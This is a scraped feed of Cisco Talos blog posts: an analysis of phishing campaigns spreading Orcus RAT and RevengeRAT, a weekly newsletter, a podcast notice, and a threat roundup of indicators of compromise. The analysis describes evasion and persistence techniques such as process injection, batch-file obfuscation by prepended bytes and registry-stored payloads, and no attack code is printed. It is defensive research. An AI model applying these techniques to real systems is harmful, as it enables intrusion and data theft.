                  Legitimate Tools:

                  ee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace Studio
                  d1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio

                  RAT Ratatouille: Backdooring PCs with leaked RATs

                  $
                  0
                  0
                  By Edmund Brumaghin and Holger Unterbrink.

                  Executive summary

                  Orcus RAT and RevengeRAT are two of the most popular remote access trojans (RATs) in use across the threat landscape. Since its emergence in 2016, various adversaries used RevengeRAT to attack organizations and individuals around the world. The source code associated with RevengeRAT was previously released to the public, allowing attackers to leverage it for their own malicious purposes. There are typically numerous, unrelated attackers attempting to leverage this RAT to compromise corporate networks for the purposes of establishing an initial point of network access, the performance of lateral movement, as well as to exfiltrate sensitive information that can be monetized. Orcus RAT was in the news earlier this year due to Canadian law enforcement activity related to the individual believed to have authored the malware.

                  Cisco Talos recently discovered a threat actor that has been leveraging RevengeRAT and Orcus RAT in various malware distribution campaigns targeting organizations including government entities, financial services organizations, information technology service providers and consultancies. We discovered several unique tactics, techniques, and procedures (TTPs) associated with these campaigns including the use of persistence techniques most commonly associated with "fileless" malware, obfuscation techniques designed to mask C2 infrastructure, as well as evasion designed to circumvent analysis by automated analysis platforms such as malware sandboxes.

                  The characteristics associated with these campaigns evolved over time, showing the attacker is constantly changing their tactics in an attempt to maximize their ability to infect corporate systems and work toward the achievement of their longer-term objectives.

                  Malicious email campaigns

                  There have been several variations of the infection process associated with these malware distribution campaigns over time. In general, the emails in every case claim to be associated with complaints against the organization being targeted. They purport to be from various authorities such as the Better Business Bureau (BBB). Below is an example of one of these emails:
                  Phishing email
                  In addition to Better Business Bureau, Talos has also observed emails purporting to be associated with other entities such as Australian Competition & Consumer Commission (ACCC), Ministry of Business Innovation & Employment (MBIE) and other regional agencies.

                  Earlier malware campaigns contained a hyperlink that directed potential victims to the malicious content responsible for initiating the malware infection. The attacker made use of the SendGrid email delivery service to redirect victims to an attacker-controlled malware distribution server.

                  The link in one example email was pointed to the following SendGrid URL:

                  https://u12047697[.]ct[.]sendgrid[.]net/wf/click?upn=X2vR6-2FdIf8y2XI902U8Tc8qh9KOPBogeTLss4h7AKXe0xRjCQw1VcMTssPPPTU28KY7PwUPERvVvIa8n4VQD-2Fw-3D-3D_tIiqtngjMfK6xwiZyGxyMuaZ5weLruJKBoFJsVrKYBziY2h51ElcQ2ocLru0oJCxt-2FOlkcr6RH8ktqTc-2B-2BQjmMscOQaeiy2zw8OOUb6nD0f1srQnQG-2B-2BIXtpubqjWMnnIHxJg3TvgFRq0itu75WQHjsdUv1O1g-2FrQzQAyJkGQN6vC9fH5R4R4FyLG9ahUnvbnHt-2FEmdUJQuft0jfw2c5uPBA2M5Yspgi-2Fodr8cEU2b8-3D

                  This URL is responsible for redirecting the client to a URL hosted on an attacker-controlled server that hosts a ZIP archive containing the malicious PE32 used to infect the system. Below, you can see the HTTP GET request that is responsible for retrieving this and continuing the infection process.
                  ZIP File download
                  A PE32 executable is inside of the ZIP archive. It needs to be executed by the victim to infect the system with Orcus RAT. The PE32 filename features the use of double extensions (478768766.pdf.exe) which, by default on the Windows operating system, will only display the first extension (.PDF.) The PE32 icon has been set to make the file appear as if it is associated with Adobe Acrobat.

                  Double extensions trick



                  This loader (478768766.pdf.exe) is protected by the SmartAssembly .NET protector (see below), but can easily be deobfuscated via d4dot. It is responsible for extracting and decrypting the Orcus RAT. It extracts the Orcus executable from its Resource "人豆认关尔八七" as shown in the screenshots below.
                  Orcus loader resources

                  The Class5.smethod_1 method, shown in the screenshot below, decodes the content from the resource section and restores the original Orcus RAT PE file.
                  Resource section payload decoding
                  The smethod_3 shown below finally starts another instance of the loader (478768766.pdf.exe) and injects the Orcus PE file into this loader process. Then it resumes the process, which executes the Orcus RAT PE file in memory in the 478768766.pdf.exe process context. This means the original Orcus RAT PE file is never written to disk in clear text. This makes it more difficult for anti virus systems to detect it.
                  Process injection method
                  The loader achieves persistence by creating a shortcut that points to its executable and storing the shortcut in the following Startup directory:

                  C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 

                  The dropper also copies itself over to %APPDATA%\Roaming\trfgtf\rfgrf.exe and creates and starts the rfgrf.exe.bat file, which you can see below. The bat file executes the copy of the loader every 60 seconds.
                  rfgrf.exe.bat

                  In later campaigns, the adversary modified the infection process and emails no longer leveraged the SendGrid URLs. Later emails featured the same themes and verbiage but were modified to contain ZIP archive attachments.

                  Phishing email
                  The attached ZIP archives contain malicious batch files responsible for retrieving the malicious PE32 file and executing it, thus infecting the system. Early versions of the batch file retrieved additional malicious content from the same server previously used to host the ZIP archives.
                  Malicious .bat downloader
                  One interesting thing to note about the batch files was the use of an obfuscation technique that is not commonly seen. In early campaigns, the attacker prepended the bytes "FF FE 26 63 6C 73 0D 0A" into the file, causing various file parsers to interpret the file contents as UTF-16 LE, resulting in the parsers failing to properly display the contents of the batch file.
                  Unicode obfuscation standard editor

                  The hex view of the same file shows these prepended bytes which are responsible for this parsing issue.
                  Unicode obfuscation hex view
                  This is a well-known technique as can be observed in the forum thread here.

                  Later versions of the .bat downloader featured the use of obfuscation in an attempt to make analysis more difficult. They are using a simple obfuscation method and are just replacing all characters by variables that are resolved at runtime.
                  Obfuscated RevengeRat .bat downloader
                  The decoded version of the .bat file looks like this. Like in the non-obfuscated versions of the .bat file, the adversaries are downloading the .js file to a local directory (C:\windows\r2.js) and executing it.
                  Decoded obfuscated .bat file

                  This r2.js file is another obfuscated script. It is filled with a bunch of rubbish and one long line of code.
                  Downloaded r2.js file
                  This scripts writes the 'TVqQ…' string into the registry.
                  r2.js payload

                  Stored encoded malware in registry key
                  It loads this string at the end of the infection process, decodes it and executes it.
                  r2.js payload decoding routine
                  Decompiling this payload in dnSpy shows an old friend: RevengeRAT.
                  RevengeRAT decompiled binary


                  Command and control (C2) obfuscation


                  As is the case with many popular RATs, the C2 infrastructure was observed leveraging Dynamic Domain Name System (DDNS) in an attempt to obfuscate the attacker's infrastructure. In the case of these malware campaigns, the attacker took an additional step. They pointed the DDNS over to the Portmap service to provide an additional layer of infrastructure obfuscation.

                  Portmap is a service designed to facilitate external connectivity to systems that are behind firewalls or otherwise not directly exposed to the internet.
                  Port forwarding service
                  These systems initiate an OpenVPN connection to the Portmap service, which is responsible for handling requests to those systems via port mapping. We have recently observed an increase in the volume of malicious attackers abusing this service to facilitate the C2 process across various malware families.
                  HTTPS certificate

                  As demonstrated above, the DNS configuration for the DDNS hostname used by the malware for C2 has actually been pointed to the Portmap service. Let's Encrypt issued the SSL certificate associated with this host.

                  Payload analysis

                  The adversaries used at least two different RATs in the campaigns which we have closely analyzed: Orcus RAT and RevengeRAT. For both RATs, the source code was leaked in the underground and several adversaries have used it to build their own versions. You can see the comparison of the leaked version of RevengeRAT and the one we analyzed below.
                  Compairson leaked malware and modified one
                  The adversaries changed the source code slightly. They moved the original code into separate functions and changed the execution order a bit plus added other minor changes like additional variables, but overall the code is still very similar to the leaked code. On the other hand, it is modified so that the resulting binary looks different for AVs.

                  It is interesting to see that both (Client) IDs are pointing to the same name: CORREOS. In the Nuclear_Explosion file, aka RevengeRAT, it is only base64 encode "Q09SUkVPUw==".
                  RevengeRAT Atomic class config

                  Orcus decoded XML config


                  Conclusion


                  These malware distribution campaigns are ongoing and will likely continue to be observed targeting various organizations around the world. RevengeRAT and Orcus RAT are two of the most popular RATs in use across the threat landscape and will likely continue to be heavily favored for use during the initial stages of attacks.

                  Organizations should leverage comprehensive defense-in-depth security controls to ensure that they are not adversely impacted by attacks featuring these malware families. At any given point in time, there are several unrelated attackers distributing these RATs in different ways. Given that the source code of both of these malware families is readily available, we will likely continue to see new variants of each of these RATs for the foreseeable future.

                  Coverage

                  Additional ways our customers can detect and block this threat are listed below.


                  Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                  Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                  Email Security can block malicious emails sent by threat actors as part of their campaign.

                  Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                  AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                  Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                  Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


                  Indicators of Compromise (IOCs)


                  The following indicators of compromise (IOCs) have been observed to be associated with malware campaigns.

                  ZIP Hashes (SHA256):

                  c66c96c8c7f44d0fd0873ea5dbaaa00ae3c13953847f0ca308d1f56fd28f230c
                  d6c5a75292ac3a6ea089b59c11b3bf2ad418998bee5ee3df808b1ec8955dcf2a

                  BAT Hashes (SHA256):

                  20702a8c4c5d74952fe0dc050025b9189bf055fcf6508987c975a96b7e5ad7f5
                  946372419d28a9687f1d4371f22424c9df945e8a529149ef5e740189359f4c8d

                  PE32 Hashes (SHA256):

                  ff3e6d59845b65ad1c26730abd03a38079305363b25224209fe7f7362366c65e
                  5e4db38933c0e3922f403821a07161623cd3521964e6424e272631c4492b8ade

                  JS Hashes (SHA256):

                  4c7d2efc19cde9dc7a1fcf2ac4b30a0e3cdc99d9879c6f5af70ae1b3a846b64b

                  Domains:

                  The following domains have been observed to be associated with malware campaigns:

                  skymast231-001-site1[.]htempurl[.]com
                  qstorm[.]chickenkiller[.]com

                  IP Addresses:

                  The following IP addresses have been observed to be associated with malware campaigns:

                  193[.]161[.]193[.]99
                  205[.]144[.]171[.]185


                  Threat Source newsletter (Aug. 22)

                  $
                  0
                  0

                  Newsletter compiled by Jon Munshaw.

                  Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                  What’s old is new again.

                  Our research this week centers around a series of long-lasting threat actors and malware that have been given new life.

                  China Chopper, a 9-year-old web shell, is more prevalent than ever now that the source code is out there, so any threat actor could conceivably use it. We recently discovered three distinct campaigns using it for a variety of malicious activities.

                  We’ve also discovered threat actors using two of the most popular RATs— Orcus RAT and RevengeRAT — to target government entities, financial services organizations, information technology service providers and consultancies.

                  We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                  Upcoming public engagements with Talos

                  Event: “DNS on Fire” at Virus Bulletin 2019
                  Location: Novotel London West hotel, London, U.K.
                  Date: Oct. 2 - 4
                  Speaker: Warren Mercer and Paul Rascagneres
                  Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                  Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                  Location: Metro Toronto Convention Center, Toronto, Canada
                  Date: Oct. 7 - 10
                  Speaker: Edmund Brumaghin and Earl Carter
                  Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                  Cyber Security Week in Review

                  • Apple released a patch to fix a jailbreak vulnerability in iPhones. The update came weeks after the company mistakenly unpatched a previous fix for the bug, which was eventually discovered by a security researcher. 
                  • The U.S. government is close to releasing a plan focused on protecting the 2020 U.S. presidential election from a ransomware attack. Officials are concerned with protecting voter registration databases from theft, manipulation or total takeover. 
                  • Spammers have started using Google Calendar invites as their latest attack vector. These invites usually contain malicious links, and clicking on these links will signal to the attacker to send additional invites in the future. 
                  • Courts in Georgia are still recovering from a ransomware attack earlier this year. Their systems are still down, forcing many to keep track of criminal cases and traffic citations with paper records. 
                  • U.S. officials say a cyber attack earlier this summer against Iran has hindered the country’s ability to target American oil tankers. Iran is reportedly still recovering data from the attack and has had to totally restart some systems, including military communications networks. 
                  • Security researchers discovered two malicious apps on the Google Play store that ran ads in the background on users’ devices, draining battery power and increasing mobile data usage. The apps were downloaded a combined 1.5 million times. 
                  • Home security company Ring says it has partnerships with more than 400 police departments across the country. This collaboration can take several forms, including information-sharing, access to Ring’s online community and rebates to customers. 
                  • French police and a security firm teamed up to remove a wormable cryptocurrency miner from 850,000 machines in the country. The botnet’s C2 server contained a vulnerability that allowed the team of researchers to make it possible for the victims to remove the miner without executing any additional code. 
                  • NATO’s secretary general said the military alliance would collectively respond to a major cyber attack on one of its 29 member countries. Jens Stoltenberg used the 2017 Wannacry attack as an example of something that could trigger the “Article 5” clause in NATO’s charter. 
                  • Apple says it will no longer retain recordings of users’ conversations with Siri and released an apology for allowing humans to listen to the recordings in the past. The company now says users can choose to opt in to the program, which is designed to improve Siri’s capabilities. 

                  Notable recent security issues

                  Title: Critical vulnerabilities found in some Cisco smart switches 
                  Description: Two vulnerabilities in Cisco's 220 series of smart switches for small businesses could allow an attacker to leak sensitive information or inject malicious code. CVE-2019-1912 could allow an attacker to bypass security checks on the switch and upload arbitrary files. And CVE-2019-1913 opens the switches to a buffer overflow attack, which could be used to gain the ability to remotely execute code on the machine with root privileges. 
                  Snort SIDs: 51293 – 51295 (Written by John Levy), 51298 – 51300 (Written by Amit Raut), 51306 - 51307 (Written by Tim Muniz) 

                  Title: Popular VPN services open to attack, data leaks  
                  Description: Attackers are actively exploiting vulnerabilities in the Fortigate and Pulse VPN services to steal encryption keys, passwords and other sensitive data. These campaigns, which started last week, target the Webmin utility for managing Linux and *NIX systems. These are devices in enterprise networks, and the vulnerabilities involved could allow an attacker to take complete control of a system. 
                  Snort SIDs: 51240 – 51243 (Written by John Levy), 51288, 51289 (Written by Joanne Kim)

                  Most prevalent malware files this week

                  SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3  
                  MD5: 47b97de62ae8b2b927542aa5d7f3c858 
                  Typical Filename: qmreportupload.exe 
                  Claimed Product: qmreportupload 
                  Detection Name: Win.Trojan.Generic::in10.talos 

                  SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510  
                  MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                  Typical Filename: xme64-2141.exe
                  Claimed Product: N/A
                  Detection Name: W32.7ACF71AFA8-95.SBX.TG

                  SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c  
                  MD5: c785a8b0be77a216a5223c41d8dd937f 
                  Typical Filename: cslast.gif 
                  Claimed Product: N/A 
                  Detection Name: W32.1755C179F0-100.SBX.TG 

                  SHA 256:
                   46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08  
                  MD5: db69eaaea4d49703f161c81e6fdd036f
                  Typical Filename: invoice.exe
                  Claimed Product: N/A
                  Detection Name: W32.46B241E3D3-95.SBX.TG

                  SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                  MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f 
                  Typical Filename: sayext.gif 
                  Claimed Product: N/A 
                  Detection Name: W32.093CC39350-100.SBX.TG 

                  Beers with Talos Ep. #60: Summer camp flashbacks and defining your intel

                  $
                  0
                  0


                  Beers with Talos (BWT) Podcast episode No. 60 is now available. Download this episode and subscribe to Beers with Talos:

                  If iTunes and Google Play aren't your thing, click here.

                  Recorded Aug. 16, 2019 — The understatement of the day would be the guys were in some kind of mood when we recorded this. There is no explaining the way they are sometimes. We ended up discussing a lot of the awesome things that went on at Blackhat and DEFCON, like the time Matt and Mitch got ejected from the Aviation Village for recognizing the prowess of the greatest plane ever built. And also the time Joel ejected himself from the Cisco party. Deeper in the episode we get into threat intelligence: What is it, how to find the intel you need, and how do you leverage it to create value?

                  The timeline:

                  • 02:00 — Roundtable: Leeroy Jenkins, gratitude, and a special guest Esler
                  • 15:25 — Blackhat and DEFCON recap
                  • 51:10 — Threat intelligence: What this means and how you need to be using it
                  ==========

                  Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                  Hosted by Mitch Neff (@MitchNeff)
                  Subscribe via iTunes (and leave a review!)


                  Subscribe to the Threat Source newsletter


                  Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                  Threat Roundup for August 23 to August 30

                  $
                  0
                  0
                  Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 23 and Aug. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                  As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                  For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                  The most prevalent threats highlighted in this roundup are:
                  Threat NameTypeDescription
                  Win.Worm.Vobfus-7141112-0 Worm Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
                  Win.Dropper.VertexNet-7139734-0 Dropper VertexNet is a remote access trojan that provides basic functionality like the ability to download files, monitor keystrokes, and provide a remote shell to the attacker.
                  Win.Malware.Ursnif-7139346-0 Malware Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
                  Win.Trojan.Remcos-7136041-1 Trojan Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
                  Win.Dropper.TrickBot-7135730-0 Dropper Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts.
                  Win.Dropper.Nymaim-7135710-0 Dropper Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
                  Win.Ransomware.TeslaCrypt-7135496-1 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
                  Win.Dropper.SpyEye-7134261-0 Dropper SpyEye is an information-stealing malware that attempts to collect usernames, passwords, and credit card numbers as they are entered into the user's web browser.
                  Win.Dropper.Qakbot-7133972-0 Dropper Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.

                  Threat Breakdown

                  Win.Worm.Vobfus-7141112-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR
                  Value Name: Locked
                  10
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                  Value Name: ShowSuperHidden
                  10
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 10
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                  Value Name: NoAutoUpdate
                  10
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 10
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jxwiq
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jeoeri
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: guuagu
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: buazoe
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: weouw
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: puoleey
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: vuudei
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: qjzaet
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: seaumu
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: baeboig
                  1
                  MutexesOccurrences
                  A10
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  204[.]11[.]56[.]4810
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  ns1[.]timedate3[.]com10
                  ns1[.]timedate3[.]net10
                  ns1[.]timedate1[.]org10
                  ns1[.]timedate2[.]org10
                  ns1[.]timedate1[.]net10
                  ns1[.]timedate2[.]com10
                  ns1[.]timedate1[.]com10
                  ns1[.]timedate3[.]org10
                  Files and or directories createdOccurrences
                  \autorun.inf10
                  \System Volume Information.exe10
                  \$RECYCLE.BIN.exe10
                  \Secret.exe10
                  \Passwords.exe10
                  \Porn.exe10
                  \Sexy.exe10
                  E:\autorun.inf10
                  E:\$RECYCLE.BIN.exe10
                  E:\Passwords.exe10
                  E:\Porn.exe10
                  E:\Secret.exe10
                  E:\Sexy.exe10
                  E:\System Volume Information.exe10
                  E:\x.mpeg10
                  %HOMEPATH%\Passwords.exe10
                  %HOMEPATH%\Porn.exe10
                  %HOMEPATH%\Secret.exe10
                  %HOMEPATH%\Sexy.exe10
                  \<random, matching '[a-z]{4,7}'>.exe10
                  E:\<random, matching '[a-z]{4,7}'>.exe10
                  %HOMEPATH%\<random, matching '[a-z]{5,7}'>.exe10
                  %HOMEPATH%\RCX<random, matching '[A-F0-9]{3,4}'>.tmp7

                  File Hashes

                  c2767a62350a0d537b904317441c9634c0061229f88e6fdd2de972424c771355 deca43beac62ac0403adc173e8c8b45b34835165ea8241798233900870485cff e8151e83c5c703087f2f582d7d7666e9e563f19baf9eca55b00b1a8f357cb2fb e89bf0455c034b1c8c2f3813c21a5c563dfe4dcd4b1961131295d4477567b2f6 e8fc6f6c1e1dfcfaac05ea6e45cb1404ae8ef5508357fd2e6e897872761c1a73 eb4d9953b0d832e4e5be31ce624b1757dc503e548f1c85cdc871d11ac90930bd ef5099250b297ee7f0c34dff49d345f179935d1d32cbdce429769471359701a3 f0b6c9062f5601e99f3015db1bdb35e23984fe65c420ebe5e6984644d18312d7 f1ad5be9676c05b1242c6fcfb4dd86062cba1e1fe5aeaf1925387414aff90088 fb6cca89549e3d3d0c80a46080ff27dc2e06ad7081297e3a5e9c2baffe7eac30

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Dropper.VertexNet-7139734-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: win32
                  14
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Svchost
                  7
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  4
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: winlogon
                  4
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: windowsAccApp
                  4
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: windef
                  3
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Windows
                  3
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: winupdate
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Microsoftnts
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Google Updater
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: system
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: maz
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: ctfmon
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Microsoft
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Windows Update
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: explorer.exe
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: UniKey
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: taskmng
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: WinHostMngr
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: VIRUS
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Adobe
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: CRACKWIN
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jusched
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: vm
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: WinApISBMhost
                  1
                  MutexesOccurrences
                  VN_MUTEX16285
                  win3214
                  rundll2314
                  Global\c020f8c1-c573-11e9-a007-00501e3ae7b514
                  explorer.exe2
                  VN_MUTEX2
                  Me_MUTEX162
                  sadfsadfhmj4353t gfvb1
                  VN_MUTEX291
                  VN_Nyarkouf1
                  DiZi_MUTEX1
                  unh43n805q951
                  634t1
                  VN_MUTEXL33T1
                  X86 Host Process for Windows1
                  fadsfgagdfgaewwfadsfsda1
                  VN_inet11
                  net work1
                  VN_SAINT1
                  6826863HGGUSG27821
                  VN_MUTEX1331
                  teshell::netstat -an1
                  rundll32.exe1
                  WIU23fwfhWEHF2fwjhWJKHef2f1
                  VN_B4SMIX1
                  *See JSON for more IOCs
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  153[.]92[.]0[.]10062
                  104[.]20[.]67[.]4635
                  104[.]20[.]68[.]4627
                  185[.]185[.]84[.]21018
                  199[.]59[.]242[.]15115
                  144[.]76[.]162[.]2457
                  175[.]126[.]123[.]2195
                  104[.]25[.]37[.]1084
                  72[.]9[.]150[.]2444
                  31[.]170[.]160[.]574
                  35[.]186[.]238[.]1013
                  162[.]253[.]155[.]2253
                  5[.]57[.]226[.]2023
                  91[.]195[.]240[.]2103
                  185[.]53[.]179[.]292
                  185[.]53[.]178[.]82
                  104[.]200[.]23[.]952
                  204[.]11[.]56[.]482
                  88[.]99[.]150[.]2162
                  23[.]20[.]239[.]122
                  18[.]211[.]9[.]2062
                  95[.]211[.]219[.]662
                  69[.]162[.]80[.]552
                  81[.]171[.]22[.]72
                  195[.]20[.]43[.]882
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  www[.]000webhost[.]com62
                  HTTP39
                  www[.]yoursite[.]com18
                  yoursite[.]com18
                  www[.]z3mr4[.]co[.]cc10
                  www[.]subdomain[.]com7
                  www[.]altervista[.]org5
                  www[.]freewebhostingarea[.]com4
                  www[.]hugedomains[.]com4
                  freewha[.]com4
                  err[.]freewebhostingarea[.]com4
                  api[.]w[.]org3
                  gmpg[.]org3
                  iyfsearch[.]com3
                  www[.]dailyetalaat[.]com3
                  static[.]hugedomains[.]com2
                  www[.]mibotnetpol[.]tk2
                  apfrtek[.]freehosting3[.]com2
                  firemoon[.]myftp[.]org2
                  www[.]mrm3n2lok0[.]com2
                  www[.]ethy54[.]azok[.]org2
                  www[.]sgchack[.]tk2
                  www[.]hackedbootnet[.]altervista[.]org2
                  www[.]juztest[.]000a[.]biz2
                  www[.]cyber-power[.]net16[.]net2
                  *See JSON for more IOCs
